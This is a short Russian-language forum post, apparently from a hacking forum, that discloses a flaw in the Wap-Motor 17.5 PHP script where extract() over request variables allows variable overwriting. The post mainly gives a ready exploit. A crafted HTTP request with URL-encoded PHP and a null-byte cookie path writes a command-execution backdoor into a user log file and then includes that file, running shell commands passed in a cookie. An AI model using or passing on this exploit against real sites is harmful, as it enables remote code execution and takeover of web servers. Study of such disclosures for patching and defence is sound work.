роmeo xak
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
страшная тайна мотора=)
PomeoДата: Четверг, 04.09.2008, 18:05 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 44
Репутация: 0
Статус: Offline
Уязвимые версии: Wap-Motor 17.5, возможно более ранние версии

Описание: сценарий index.php подключает необходимые скрипты, первый из которых (template/start.php) извлекает данные в текущую символьную таблицу, допуская перезапись переменных:

Code
<?php
extract($HTTP_GET_VARS);
extract($HTTP_POST_VARS);
extract($HTTP_COOKIE_VARS);
extract($HTTP_SERVER_VARS);
extract($HTTP_SESSION_VARS);
?>

LFI-эксплоит (нужна сессия пользователя, а также необходим magic_quotes_gpc=off):
Code
GET /index.php/%3C%3Fphp+echo+%60%7B$_COOKIE%5B'c'%5D%7D%60%3B+%3F%3E HTTP/1.0
Host: localhost
Cookie: p=local/who.dat%00; c=id; SID=qsm8nce7777k4tvkt0vfbiem41;
Connection: close
Несмотря на путь, будет запрошен скрипт index.php, и в файл local/who.dat, логирующий активность недавних пользователей, будет записан следующий код:
Code
<?php echo `{$_COOKIE['c']}`; ?>
 
  • Страница 1 из 1
  • 1
Поиск:

Copyright MyCorp © 2026Создать бесплатный сайт с uCoz